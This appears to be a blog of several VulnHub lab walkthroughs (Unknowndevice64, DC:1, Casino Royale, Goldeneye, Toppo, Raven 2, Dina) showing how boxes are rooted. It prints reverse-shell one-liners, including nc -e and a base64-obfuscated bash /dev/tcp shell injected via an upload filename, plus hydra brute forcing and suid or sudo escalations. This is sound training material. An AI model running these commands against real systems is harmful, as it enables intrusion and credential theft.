VulnHub Unknowndevice64 Walkthrough

Unknowndevice64 is a relatively easy VulnHub box. It requires some obscure decoding but other than that it’s fairly simple to work through.

ukd1

We start off as usual with an nmap scan. Nmap -sC -sV -v 192.168.109.130 -oN map1

ukd2

We only find one port here and it’s a web page. Let’s see what it is.

ukd3

So kind of a cool flashlight effect. Here I found something that looks like a possible password. I’ll note that for later. For now let’s look at the source.

 

ukd4

 

Now we see there’s a file and another reference to a key. Let’s look at the picture file.

ukd5

Ok. We have a picture file called key_is_h1dd3n.jpg and the picture itself is called HIDDEN SECRETS. We also have a potential password of h1dd3n which is also in the file name. This smells like steganography to me. Let’s download the picture and see what we can find.

To look for a hidden message, we’re going to use a program called steghide. After looking at the help file, cause I don’t do this a lot, I figured out this command to extract the text: steghide extract -p h1dd3n -sf key_is_h1dd3n.jpg

This provided me with some wonderfully obscure text: ++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++++++++++++++.—————–.<—————-.–.++++++.———.>———————–.<<+++.++.>+++++.–.++++++++++++.>++++++++++++++++++++++++++++++++++++++++.—————–.

 

ukd6

Ok so what the heck is this? It kind of looks like garbage, but I know it’s right because of all the hints and the fact that the password works. So maybe it’s encoded in some way? Google can help with that. I put decode and the crazy string into Google search and the top result was quite interesting.

ukd7

 

Yep I’m not making this up folks. This apparently is a thing. Classy …

 

ukd8

 

After putting the string into the interpreter, the result comes out ud64:1M!#64@ud

That’s great, we have creds …. But we don’t have anywhere to use them. Let’s do another nmap scan on all the ports.

Nmap -p- -sC -sV -v 192.168.109.130 -oN map2

ukd9

Now we have a new port and it’s SSH. Let’s try to log in. Since it’s not on a standard ssh port, we’ll have to use the -p flag

ukd10

Great! We’re in!! Let’s look around.

ukd11

Only we can’t because we’re in a restricted bash shell. ☹

Luckily, we got in with SSH. That means we can bypass this restriction as we log in.

For this we use the -t option. According to the man page, it forces a pseudo-terminal allocation. In this case, it also bypasses the rbash restriction and runs bash normally.

ukd12

Now that we have a prompt, one of the first things to check is sudo permissions. Sudo -l

ukd13

Well I have no idea what this is, so I looked at the help file.

ukd14

It really doesn’t explain what it does, but the fact that it will run a command as a user I can choose was very interesting. Let’s try to cat the shadow file with it.

sudo /usr/bin/sysud64 -u root cat /etc/shadow

ukd15

Well the output was strange, but we did get the shadow file. Now you could try to crack the root password, but it’s a lot easier just to get a root shell. Let’s run bash this time!

ukd20

Ok this is truly strange output. While it’s hard to show here, commands do still work. Let’s run bash again from here and see what happens.

ukd16

As we type bash, the letters show up one character at a time. Once the command processes, we get a normal shell and we are root!

ukd17

Now let’s go for the root flag.

ukd18

ukd19

Awesome! And that finishes off unknowndevice64. I hope you enjoyed the walkthrough. If you want to see a video walkthrough, you can find it here.

 

Happy Hacking,

-R3a50n

VulnHub DC: 1 Walkthrough

This VulnHub walkthrough is a box called DC: 1. It’s rated as a beginner box and it’s really not too difficult.

We start off by running our typical nmap scan: nmap -sC -sV -v 192.168.136.132 -oN map1

dc1

There are a few ports listed here but the most interesting one is port 80. Let’s look at the website.

dc2

 

Ok it’s a Drupal site which confirms what Nmap found. Nmap also noted that the version was 7. Let’s see if we can find a more exact version. I’ll use droopescan: droopscan scan drupal -u 192.168.136.132

dc3

 

It takes a few minutes to run, but it gives us a list of possible versions between 7.22 and 7.26. Let’s see if any exploits exist.

dc4

 

Searchsploit returns a ton of results most of which center around the Drupalgeddon exploits. I successfully exploited the site with three of the exploits: 34992.py, 44449.rb, and a Metasploit module.

For this walkthrough, I’m just going to show the Metasploit route. I’ll have a video walkthrough up soon where I’ll show all three ways. The privilege escalation is the same either way.

So let’s start up Metasploit and search for drupal.

dc5

Next, we’ll set the rhosts to the site IP address

 

dc6

Now, we’ll launch the exploit to get a shell.

dc7

Now that we have a shell, we can work on privilege escalation. There are a couple ways to discover the path. By running a Linux privilege checker, or by finding a hint (in the form of a flag) on the Drupal site.

I’ll use the checker for this walkthrough. So start up a python web server and use wget to download the file. I also upgraded the shell using python.

python -c ‘import pty; pty.spawn(“/bin/bash”)’dc8

python -m SimpleHTTPServer 80

wget 192.168.136.129/privcheck.py

dc9

Then run the checker script.

dc10

The hard part about doing it this way is that it’s really easy to miss it. You also might not know that find has an exec flag that lets you run commands on what you find.

dc11

The other way to find this would be to get the mysql password form the Drupal config, find the user password hashes, and crack them. That would lead you back to the Drupal site where you could find the hint.

All that to say is that the find command has the suid bit set which will let us execute code as the owner – in this case root.

Let’s test it out.

find /etc/shadow -exec cat {} +

dc12

If you only had a webshell at this point, you could crack the password for the flag4 user account and log in with ssh. That’s not necessary to get root or even view the root flag. Find can do all that for us (I’m still using /etc/shadow here because something has to fill the spot. It really doesn’t matter what. An empty text file would work too.)

find /etc/shadow -exec bash \;

dc13

Hmmmm … what happened here? We should have been root. Let’s try it again with sh.

dc14

Now we’re root! But why didn’t it work with bash? Let’s find out.

dc15

So it looks like running bash will actually put you in a restricted bash shell. That’s not the case with sh.

Anyway, we can now go to the root folder and view the flag.

dc16

So that was DC: 1 from VulnHub. I hope you enjoyed the walkthrough. I’ll have a video up soon that walks through the other methods to get a shell.

Update: The video can be found here

Happy Hacking!

-R3a50n

 

 

VulnHub Casino Royale Walkthrough

casino0

Today we’re going to walkthrough Casino Royale from VulnHub. This was a really fun box to work through and very relevant to people working there way to OSCP. It was actually a lot harder to get into the box than to escalate privileges once there. If you’d like to see a video walkthrough of it, you can find it here.

As usual, I start off with a Nmap scan – nmap -sC -sV -v 192.168.136.136 -oN map1

casino1

There’s already a lot of information here to check out. FTP is usually interesting, but in this case anonymous login is not allowed. We’ll come back to that later. Let’s check out the websites first. I’ll start with the one on 8081.

casino2

casino3

Ok to this site is interesting, but it doesn’t seem to do anything. Note the collect.php. That will be valuable later. We’ll move on to the main site on port 80.

casino4

Alright, so Bond is raising his martini. Let’s check out a couple of those directories nmap pointed us to.

casino5

Kboard is just some flavor. Let’s check out cards.

casino6

Just more flavor, but in color this time. Let’s look for some more directories with gobuster.

Gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 192.168.136.136

casino7

Gobuster found some new things to investigate. We don’t have any user names or creds for phpMyAdmin, so let’s check out install.

casino8

Ok now we’re getting somewhere. It looks like a low version so let’s see if it’s vulnerable.

casino9

It is vulnerable and once executed, will give admin access to the site. Before we can try it out, we’ll need to find the login page. The pokerleague/pokeradmin/configure.php path doesn’t exist, but pokeradmin does. Putting in configure.php gives us a redirect to index.php. Anyway, we found the login page.

casino10

There are a couple ways to get the exploit to work. The simplest way is to paste the exploit into the URL. Like literally replace the URL with the javascript code.

casino11

 

When you paste it in it will get rid of the javascript portion so you’ll have to retype that. The other way to do it is to use the web developer tools. There’s a command line section that the script can be written in. It doesn’t like copy and pasting either, so you’ll have to allow it or just type it in.

casino12

Once you hit enter, the cookie will be set which will allow you to just bypass the authentication page. Please note that you’ll have to go back to the configure.php page, not the index.php page.

casino13

Once in, you’ll see a reference to a domain name. Add that to the /etc/hosts file. Looking at the Manage Players section gives us a list of user names. One of them has an email link.

casino14

 

Let’s look at some of the info tabs (especially Valenka’s).

 

casino15

In her profile is a link and another reminder to update your hosts file. Let’s visit the site and see what’s there.

casino16

casino17

It’s a blog site with Snowfox CMS. At the bottom of the page is a big hint that we should send a malicious link to Valenka soon. Before that, let’s see if there are any vulnerabilities with snowfox.

casino18

 

casino19

Once again, the site is vulnerable and sounds like it will fit our scenario. To make this work we’ll need to do a few things.

  • Create a webpage with the modified exploit to fit our scenario
  • Send an email to Valenka with the link to the exploit page using a name from the user list in the subject
  • Login with our newly created admin user.

So we’ll start off by creating a web-page. Here I made one called exp.html and put it in my /var/www/html directory. Then I started my apache server by using systemctl start apache2. I had some trouble getting this exploit to work properly. My assumption is that my initial password was too short and was getting rejected. Once I made it longer, it seemed to work fine.

casino20

Now that our web-page is up, we can send our malicious email. Remember the smtp server on port 25 from the nmap scan? Now we’re going to use it.

casino21

casino22

I used netcat, but telnet will work just as well. Obanno was the only user that worked for me. I couldn’t get Le to work even though that was the most logical choice. Anyway, you can watch your logs at /var/log/apache2/access.log to see when/if Valenka hits your web server. Once she does, you can login with the user name and password you set in the exploit.

casino23

Once in, check out the users page inside the admin dropdown.

casino24

Then look at Le’s account. Inside you’ll find a new link.

casino25

Let’s check it out.

casino26

Not much here, but let’s look at the source.

casino27

Here it gives a couple of hints on how to move forward. I wasn’t sure what they were talking about with the curl request so I did a google search on XML post request exploit. It brought me to this page about XML External Entities (XXE) and then I realized why they had the funky capitalization in the comments.  It also gives a hint about the FTP account which will come into play soon.

casino28

 

This blog has an excellent write-up on XXE. The code they use is exactly the same as in the casino-royal blog site. The only confusing part for me was what to actually send. The XXE blog gives the curl command and code you’ll need, but I was still confused. Once I understood what the exploit was doing, I realized I needed to make some modifications.

First off, the file you create must be called xml.txt or it won’t work.

Second, the casino-royal site gives you some very helpful hints. Unlike the blog page, which uses consistent naming conventions, casino changes the variable names. These must be updated in our PoC code as well.

casino29

In the end, the code should look like this

casino30

The given curl command should work now.

curl -d @xml.txt http://casino-royale.local/ultra-access-view/main.php

The output should contain the /etc/passwd file and we now have file read access to the system.

casino31

Here we can also see the custom ftp user. Since they said the password was easy, let’s try to brute force it with hydra.

hydra -l ftpUserULTRA -P /usr/share/wordlists/fasttrack.txt ftp://192.168.136.136

casino32

It doesn’t take very long to come back with the password bankbank. Let’s login and see what’s there.

casino52

 

Hmmm … main.php looks familiar. Let’s try battle2root.html on the Client Access: ULTRA page and see what happens.

casino33

Ok so we know that this ftp directory is accessible from the web and we can actually see the entire directory view from the web if we just view the root of the page.

casino34

If we try to upload files, most will be rejected. Apparently, there are some file restrictions in place. One type that is not restricted is perl.

Let’s upload a perl webshell and see if it works. Doing a locate on webshell in Kali will reveal a directory with some perl webshells ready to go. I’m using the one called perl-reverse-shell.pl but renaming it to pshell.pl for short.

We don’t have to modify it, but we do have to give it at least read/execute permissions after we upload.

casino35

Now when we go to the site we should see our file.

casino36

Now let’s try to execute a command.

casino37

It works! Now that we have command execution, let’s try to get a real shell.

We can tell that python is installed by issuing the command which python. The command is successful so let’s upload a python reverse shell.

casino38

Using the (one line) command this way, I’ll have to make it bash script, change permissions, and then run it. We can also just upload it as a python file and run it as python.

casino39

I started a python http server (python -m SimpleHTTPServer 80)  and used wget in the browser to transfer the file.

casino40

Then I started a netcat listener (nc -nlvp 7777) and ran the python script.

casino41

Once ran, I had a shell!

casino42

That took a lot of work, but we finally have access to the box. Let’s upgrade our shell with python.

python -c ‘import pty; pty.spawn(“/bin/bash”)’

We’re going to be manipulating code so you’ll also want to:

Ctl z                            to background the session

stty raw -echo        (enter)

fg                              (enter)

This will give you tab auto complete, up arrow history, and ability to ctl c without killing your shell.

At this point, we can do a locate on config.inc.php. This is the file that stores phphmyadmin passwords. It shows up in a few places, but eventually we get Valenka’s user password.

casino43

It turns out that this is irrelevant as switching to her user account is actually less helpful than staying in www-data. That will become apparent later. If you were savvy enough to guess the location at the XXE stage, you potentially could have used phpMyAdmin to get a shell and skip the ftp portion.

At this point, you can search around the file system looking for interesting things, running privilege escalation scripts and whatever post exploitation things you like to do. One thing I noticed is that I didn’t see any scripts relating to the port 8081 that we found at the beginning.  So I did a locate on collect.php. It’s in the opt/casino-royal directory which you also could have easily stumbled upon.

Let’s see what it does.

casino44

This script calls a python script that’s also in this directory. Let’s look at that one.

casino45

This opens a data log that displayed the message when we clicked the run data collect button. Let’s look at the file permissions for these scripts.

casino46

Here’s where the domino’s start to fall. We have write access to casino-data-collection which is called by collect.php which is triggered by hitting the website button. Since le is the only person with execute permissions our assumption will be that if we inject a shell into casino python script, and press the collect button, we can get back a shell as le. Let’s give it a shot! Nano doesn’t work so we’re stuck with vi ☹ It’s a good thing we upgraded our shell or vi would be more of a pain than normal.

 

Remember the python script we used earlier? Well we get to use it again here (make sure to change the port number). Exit with :wq!   😊

casino47

 

Now we set up a netcat listener (nc -nlvp 8888) and press the button.

casino48

Awesome! We are now le. This is a good time to upgrade your shell with python again.

Now we have more privileges with the scripts that are in this directory

One thing I forgot to mention earlier is that I ran the mi6_detect_test as www-data.

casino49

It seemed to output some connections using netstat.

As le, we have access to a new script call run.sh and when we run it look what happens.

casino53

 

Notice any similarities? The detect script is calling run.sh. The main difference is that the detect script is running as root! Just like before, if we change the code in run.sh with shell code, and run the detect script, we should get root. Let’s fire up vi one more time and put in our code.

Since this is a bash script, our oneliner will work better.

casino50

Now we start a listener one more time (nc -nlvp 9999), and run ./mi6_detect_test

casino54

ROOT!

 

Inside the root folder is a flag folder containing a bash script. Run it for the reward.

casino51

casino55

And that was Casino Royale! I thought this was a great box to work on and I learned some new hacking techniques (which is always the goal). Hopefully the walkthrough was helpful.

-R3a50n

VulnHub Goldeneye Walkthrough

In this walkthrough, we’ll be looking at Goldeneye from VulnHub. This one was a lot of fun simply because of the flavor. It felt a lot like the OSCP labs as well. So let’s get started!

A typical Nmap scan reveals a few ports – 80 and 25.

geye1

nmap -sC -sV -v 192.168.109.133

We’ll check out the webpage but first let’s get another scan going in the background

nmap -sC -sV -v -p- 192.168.109.133

This will search for all ports not just the top 1000 while we do other things.

Navigating to the webpage gives us a fun taste of the box theme.

geye2

It also gives a directory to browse. Let’s see what’s there.

geye3

Well we don’t have any creds to try right now so we’ll come back later. Let’s look at the source of the home page first.

geye4

There’s not much here but let’s see what terminal.js is.

Here we have something interesting. It looks like we have two user names and one encoded password.

geye5

I’m going to use BurpSuite to decode it. Once BurpSuite is open, navigate to the Decoder tab and paste in the encoded string. Then click on the Decode as drop down on the right and select HTML. This reveals the password of InvincibleHack3r.

geye6

Now let’s try that login again.

geye7

It works and we get some more fun stuff and some hints. It’s a good thing we have our scanner going.

Before we leave let’s check the source of this page. Not much is here but at the bottom we do find out that Boris and Natalya are supervisors.

geye8

Now let’s go back to our nmap scan and see if it found the pop3 ports.

geye9

It looks like it did. Unfortunately, the password for Boris doesn’t work.

At this point, we have things we can do and since they might take a little time, let’s get them going at the same time.

First, we’ll get a pop3 brute force going. This is actually where I first ran into trouble. It’s very important to pick a good wordlist here. A lot of times I’ll just use the rockyou wordlist and go do something else while it churns away. In this case, it’s not an option. Hydra will crash after a couple minutes but it will give a suggestion to use a shorter wordlist (this is critical). Medusa won’t crash but it will throw errors and recover so I went with Medusa instead.  The problem is still a short password list. I ended up using a password top 10,000 from SecLists, but even that was too big, and I missed out on getting the password for Boris. His password wasn’t critical though. The password list that ultimately works the best in this case is called fasttrack.txt. It’s native to Kali unlike SecLists which is cloned from GitHub.

Ok so now we have a wordlist, but we need to pick our users. We could do all of them since the list is so short, but the webpage said Boris and Natalya were the administrators to send email to. The nice thing is that we can check their names first. Remember the smtp server on port 25. Let’s see who’s valid.

Using netcat (nc -nv 192.168.109.133 25) we can log into the smtp server. Using vrfy USERNAME we can check the response from the server. Boris and Natalya come back but the others do not. There no sense wasting time brute forcing users that don’t exists so let’s just create a text file with there names only.

geye11

Now we can use hydra or medusa to run through the password list.

hydra -L users -P /usr/share/wordlists/fasttrack.txt pop3://192.168.109.133:55007

or

medusa -U users -P /usr/share/wordlists/fasttrack.txt -h 192.168.109.133 -n 55007 -M pop3 -t 16

With hydra, you’ll want to keep the user names separate because it will crash. At least it did for me, and it won’t recover. Doing one at a time, it won’t run into issues before it finds the passwords.

geye41

Medusa will also have issues, but it will recover and continue, and you can do both names together.

geye13

Either way, after a couple minutes you’ll have passwords for both Boris and Natalya. For all Natalya’s trash talking, her password is actually worse than Boris.

geye12

geye14

Anyway, we’ll just let the brute force run while we do this other stuff.

Next we can start gobuster on the website to see if there are any other hidden directories. gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -u 192.168.109.133 (It won’t find anything)

Finally, we’ll start a nikto scan on the website while we guess passwords. nikto -h 192.168.109.133

This finds a fun page called /splashAdmin.php which gives us some more potential user names and a really good hint we’ll need later.

Users – Xenia and Janus

Hint – GCC is replaced with the FreeBSD alternative (A quick google search shows this as cc.)

geye10

By now our password brute force should be finished and we can put those credentials to good use.

Let’s log into the pop3 server and check out some emails.

nc -nv 192.168.109.133 55007
user boris
pass secret1!
List
Retr 1
Retr 2
Retr 3

geye15

There’s some fun theme stuff here, but nothing important. Let’s do the same with Natalya’s account.

geye16

Now we’re getting somewhere. We have a new page to check and some account creds. You will have to edit the etc/hosts file first as the email suggests. Then navigate to the site.

geye17

At the bottom of the page you can find it’s running moodle. Once logged in it looks like there’s a message from Dr. Doak. Clicking on the contact information shows that his email username is doak.

geye18

Let’s see how secure his password is.

hydra -l doak -P /usr/share/wordlists/fasttrack.txt pop3://192.168.109.133:55007

geye19

These secret agents really need to pick better passwords. Well let’s see what’s in his email.

geye20

Ok now we have some admin creds. Let’s log back into the website with these and see what we can find. Inside a page called My private files is a secret.txt file. Let’s see what’s in it.

geye21

geye22

Let’s view the file

geye23

Hmmm … that doesn’t seem too special. Maybe there’s more to it. Let’s download it and see what else we can find.

We can either run file or exiftool. Either way a base64 encoded string can be found in the image description.

geye24

Decoding this reveals a password for the admin account.

echo eFdpbnRlcjE5OTV4IQ== | base64 -d

geye25

Let’s log in one more time as the admin.

geye26

Now we can easily identify the Moodle version.

geye27

A quick Google search reveals that this version is exploitable and there’s a Metasploit module for it. You could also just search for it in Metasploit.

geye28

There is one important thing to point out with this module. The target id must be set manually. I know it says 0 is automatic, but it doesn’t work right and will fail. So just set the target to 0 before you run the exploit.

geye29

There’s one more thing you’ll have to do to get this to work. The spell check engine must be set to PSpellShell. If you look at the exploit code, it looks like this should be set during exploitation, but it’s not and you have set in manually.

geye31

geye42

Once this is set run the exploit and you should get a shell.

geye32

Now I’ll upgrade my shell using python. It’s not really necessary for this box, but it’s still nicer to work with.

python -c ‘import pty; pty.spawn(“/bin/bash”)’

There are a couple scripts I usually download and run at this point, but it turns out they are not super helpful. The exploits are there but buried. It was much easier to find by enumerating the kernel manually.

uname -a
cat /etc/lsb-release

geye34

The first search that pops up looks like it fits.

It’s C code so let’s use GCC and compile it on our box.

gcc 37292.c

It gives some warnings, but it looks like it compiled. Let’s see if it works.

geye35

I stated a python server and used wget to transfer the file.

Attcker box: python -m SimpleHTTPServer 80
Victim box: wget 192.168.109.128/a.out
Chmod +x a.out
./a.out

geye36

When we run it, it doesn’t work. One of the error messages is gcc: not found.

That’s odd right? Let’s look at the code and search for gcc.

geye37

So the code is compiling something else when it runs. Remember the hint about gcc being removed. The compiler on this box is cc. Let’s change the compiler in the code to cc and see if it works.

Just FYI: the script may freeze the shell. If it does, you’ll have to manually clean up the files and directories left by the exploit before trying the new version.

Once the new version using cc is run, a root shell spawns.

geye38

The root flag is hidden. Use ls -lah to find it.

geye39

The final reward is in a web directory you might have found earlier, but if not, take a look at the ending scene.

geye40

Well that was Goldeneye. The word list thing was a little frustrating, but theme of the box was really fun. Anyway, I hope you enjoyed the walkthrough. If you’d like to see a video walkthrough you can find it here. In the video, I also show how to get a shell without using Metasploit.

Happy Hacking!

-R3a50n

Vulnhub Toppo Walkthrough

toppo1

Today’s writeup is a machine called Toppo from Vulnhub. Toppo is rated at beginner level and is fairly simple to root. Depending on how you go about the privilege escalation, it could throw you off a bit.

I started off by running a typical nmap scan (nmap -sV -sC -v 192.168.2.92 -oN map1). It has SSH and Port 80 open. Let’s check out the web page.

toppo2

Here we have a blog site, but not much else. Let’s run a directory brute force to see if anything else can be found.

toppo3

Running gobuster provides us with an interesting admin directory. Gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 192.168.2.92

 

toppo4

In the admin directory are some notes.

toppo5

The notes give us the user name and password for something. Let’s try it out on SSH.

toppo6

SSH worked!

toppo7

Checking some basics like the bash history and sudo permissions doesn’t yield anything. So I used wget to bring over linuxprivcheker.py and ran it.

python -m SimpleHTTPServer 80

wget 192.168.2.30/linuxprivchecker.py

toppo8

When running the script something interesting happened. It said I was already root.

toppo9

What’s happening here is that python runs as root. This means that if we spawn a shell with python, we can be root too.

python -c ‘import pty; pty.spawn(“/bin/bash”)’

toppo10

Ok so what went wrong? The script clearly ran as root (it even dumped the shadow file), so why didn’t we get a root shell? Somethings not right. Let’s try it again with sh.

toppo11

Ok that worked. Now we’re root. It looks like bash will always run under the context of the ted user, but sh works normally. Now we can get the flag.

toppo12

That’s Toppo. It’s a basic and quick box to pop. If you used sh with python from the start, you’d completely miss the weird bash issue. Another way to do it would have been to spawn a python reverse shell. Alternatively, it might have been possible to crack the root password from the shadow file dump (after running linuxprivchecker), but I didn’t try it.

If you’d like to see a video walkthrough with the python reverse shell, you can find it here.

Hope you found this helpful.

-R3a50n

Vulnhub Raven 2 Walkthrough

raven32

Well I did Raven 1 a while back, so I decided to give Raven 2 a try. It proved to be a lot more challenging.

I started out doing the nmap scan: nmap -sC -sV -v 192.168.2.93 -oN map1

This listed an open webpage similar to last time.

raven1

Next I opened up a web browser and navigated to the page. I’ll also say that I prepped my box by adding raven.local to the /etc/hosts file. It’s not critical, as the exploit doesn’t need it, but it does help while you’re just navigating the web pages.

The page looks identical to Raven 1.

raven2

Running nikto against it shows that WordPress is still available (nikto -h 192.168.2.93). This, however, is a rabbit trail. Trying to brute force the users like in Raven 1 won’t get you anywhere and will take a long time.

raven3

To find other directories, I like to run gobuster (gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 192.168.2.93)

A directory called vendor sticks out.

raven4

In the vendor directory is a file called PATH. Let’s see what’s in it.

raven33

Inside is the first flag! It also shows the path to the web root. It’s common but we’ll make note of that for later.

raven6

Also in the vendor directory is a file called VERSION along with a lot of references to phpmailer.

raven5

The version appears to be 5.2.16. Let’s look to see if it’s vulnerable.

raven7

Using searchsploit (searchsploit phpmailer 5), I found several exploits for that version of phpmailer including a Metasploit module. The problem is that all of them failed out of the box. I ended up choosing the .pl exploit for reasons I’ll explain below.

raven9

Since none of my other enumeration provided any optional paths, I felt fairly strong that this was the way in. I just needed to figure out what was breaking the exploits.

First, I wanted to see what the web request looked like. BurpSuite helped me out there.

raven8

One of the things I clued in on right away is that the request variables were not the same as in the exploits and one was missing (the subject).

After reviewing the exploit code, it became clear that I needed a few things. I needed to edit the post fields to match what’s in Burp and I needed a read/writeable directory that was accessible to the web. I chose the .pl file because the code was simple and I could easily edit those fields along with the payload. There were two types of payloads built into this exploit. Other exploits, like Metasploit for example, didn’t have all of those as an option and I didn’t want to dig into the back end of the exploit. The funny thing is that this code is not written in perl. It’s clearly python.

raven10

The original code looks like this:

raven11

The highlighted items are all things that need to be adjusted. The php code will work fine for a test, but we’ll have to change that to exploit the box.

I changed the URL to the contact page, the php code to a command shell, set the action to submit, the name to r3a50n (I wasn’t sure if a space would cause an issue), and added a subject. I also uncommented out the first payload as I thought that was more applicable.

The read/write directory did take some discovery.

raven12

The original code put the RW directory in uploads. The problem here is that there wasn’t an uploads directory. WordPress had one though. There’s even a flag hidden there.

raven13

This seemed like a good hint for a writable directory, so I tried it out. It failed. I then tried everything along that path, backing up one directory every time. Finally, I had success in the web root directory.

My final code looked like this:

raven14

Once I launched the exploit, the code was in place.

raven15

Now we can test for code execution. By adding ?cmd=id we can see if the code executes. Viewing the web page source will make it a lot easier to read.

raven16

We have code execution. Now let’s try to get a shell. Luckily for us, a version of netcat is installed that allows reverse connections to get a shell. That makes it easy. I started up a listener (nc -nlvp 9999) then ran ?cmd=nc -nv 192.168.2.30 9999 -e /bin/bash in the command shell.

Once I hit enter I had a shell!

raven17

Now I needed to upgrade it.

python -c ‘import pty; pty.spawn(“/bin/bash”)’

Ctl z

stty raw -echo

fg

raven18

Now we have up arrow and ctl c just like a regular shell. This will be really nice later when we need to access the MySQL database

Next we’ll send over linuxprivchecker to help with privilege escalation

Set a python webserver in the directory with the priv checker script

raven19

I then moved to the tmp directory since it’s typically world writeable and used wget to transfer the file.

raven20

… And then I ran it.

Two exploits came to the top of the list. One I ruled out since it required a brute force of SSH keys and this box uses password only. The other one looked like a good candidate but we need to get the MySQL database password first.

raven21

Inside the WordPress  directory is a file called wp-config.php. This file usually contains the password we need.

Cat wp-config.php | grep password -A2 displays the password R@v3nSecurity

raven23

Now let’s test it out. If you were wondering why upgrading the shell is so important, this is why. Accessing MySQL will not work in a basic shell.

Type mysql -u root -p then put in the password when prompted. This should bring you to a MySQL prompt.

raven24

In here we could extract and crack WordPress passwords, but that won’t help us at this point. For now, we can just log out of MySQL by typing quit and work on getting the exploit working.

The first thing the exploit needs is to be compiled. Gcc isn’t on the raven box so I had to compile it on my Kali host. The exploit does a good job of walking through the commands which makes it so much nicer. As nice as it is, there’s still a typo. The W1 (as in the number one) is actually Wl (as in lower case L).

After following the commands in the exploit, you should end up with a file ending in .so. Copy that file over to the raven box using python web server and wget as before.

raven25

Then continue to follow the exploit instructions using mysql.

Eventually the commands will produce an error.

raven26

The error states that it can’t fine the file and gives the path where it’s looking for it. To fix this issues, just redo previous select statement with the path provided in the error. It should read something like: select * from foo into dumpfile ‘/usr/lib/mysql/plugin/priv.so’;

Now when we run the command again we get no errors.

raven27

With that in place we should be able to run commands as root. Let’s try out the proof.

raven28

That worked! Now to get a root shell.

I just spawned another netcat listener and used the same netcat shell as before on port 8888

raven30

The command hangs as soon as it’s entered, but back in our shell window we get a connection as root!

raven31

I used python to upgrade my shell again (not necessary but it’s just nicer).

Then I went for the root flag.

raven29

That ends Raven 2. It was significantly more difficult than Raven 1. Raven 1 was basically brute force a password and then sudo for root. Version two required a lot more effort which I honestly was not expecting. Anyway, I did learn some things, which is always the goal, so that’s good.

Update 2/24/2019: I finally uploaded a video walkthrough. You can view it here. I struggled at the end because of a stupid copy/paste error but I eventually get there.

-R3a50n

Dina Walkthrough

dina18

Hi All,

This post is a walkthrough for Dina 1.0.1 on Vulnhub.

Dina uses DHCP so you’ll have to figure out what the IP is. Using netdiscover -r IPRANGE will help you with that.

First thing to do is to run a nmap scan … nmap -sC -sV -v IPADDRESS -oN OUTPUTFILE

dina1

There’s not much to go off of except a webpage. It does list the directories from the robots.txt file. Let’s go to the webpage and see what’s there.

dina2

Not much here even when looking at the source. Let’s try some of the robot.txt directories.

dina3

This is not a normal error message. Let’s look at the source.

dina4

Ok so this is interesting. Somebody thought it was a great idea to put a bunch of passwords in the source of the webpage. This is a very simple example of security by obscurity and it doesn’t work. Unfortunately, we don’t have anything to try the passwords on. The other robot.txt directories didn’t turn up anything. Let’s do some more enumeration.

Running nikto on the site (nikto -h IPADDRESS) gives us some more directories to look at. One of them is called secure … that might be interesting.

dina5dina6

Inside the secure directory is a file called backup.zip. I couldn’t unzip it with native Kali tools, so I put it in Windows and used 7zip. It prompts for a password. Luckily, we have a few to try.

dina7

The first password in the list (freedom) worked and I was able to extract the mp3 file. Sometimes in CTFs, they put challenges into audio files. I was all prepared with my audio editor except the file wouldn’t load. It wasn’t an mp3.

dina8

Running file against the mp3 revealed that it was just a text file.

I renamed the file to a text file and took a look at it.

dina9

This gives us a user name and a new url with a login. Let’s check it out!

dina19

 

On the page is something called playSMS. Using the user name touhid and running through the password list from earlier, I was able to login with the password diana.

dina20

 

At this point, I looked for places to upload files or code. There was one place that allowed a file upload, but the file itself never really wrote to the system. I went to Google and searched for playSMS exploits and I found one in exploitDB. There are also two Metasploit modules that work on this VM. The manual way is more interesting though, so I’m going to show that method. If you can’t get it to work, go the Metasploit route.

dina21

The key here is the filename. After the upload, the system will display the filename. If the filename contains php code, the code will execute. In the example they are running the system command uname -a. Let’s try it and see what happens.

dina10

dina11

Now we have code execution! The only problem is that slashes / are not allowed in files names. That makes it really hard to get a reverse shell. They system does have netcat, but it’s not a version with the gaping security hole (-e flag). The solution is to encode the command string and get the system to run it on the other side.

First, let’s find a reverse shell to use. I used this from pentestmonkey: bash -i >& /dev/tcp/192.168.2.30/7777 0>&1

Now echo that into base64: echo “bash -i >& /dev/tcp/192.168.2.30/7777 0>&1” | base64

This gave me YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMzAvNzc3NyAwPiYxCg== as the encoded string. Yours will be different based on the IP address and port number.

dina12

So now we have an encoded string that should give us a reverse shell. Now we need to set up the filename to decode and run it on the other end.

Inside the single quotes where we had uname -a, we’re going to replace that with: echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMzAvNzc3NyAwPiYxCg== | base64 -d | bash

What we’re doing is echoing the string, piping it into base64 (decoding it with the -d flag), and finally piping the string to bash for execution.

Now we need to get our listener setup: nc -nlvp 7777

dina13

Once the file is uploaded, we get a shell!

dina14

The first thing I do after this is spawn a better shell: python -c ‘import pty; pty.spawn(“/bin/sh”)’

dina15

Now I can do things like sudo. Let’s check our sudo permissions with sudo -l.

dina16

This is awesome! We can run Perl commands as root. Googling for reverse shells, I easily found this one using Perl: perl -e ‘exec “/bin/bash”;’

The only change is that we’ll have to use the full path to Perl for this to work.

dina16

ROOT!

Navigating to the root directory and viewing the root flag is now possible.

dina17

That’s the box. It was definitely beginner level especially if using Metasploit. Hopefully you found it helpful.

If you want to see a video walkthrough where I also show the Metasploit path, you can view it here on YouTube

 

-R3a50n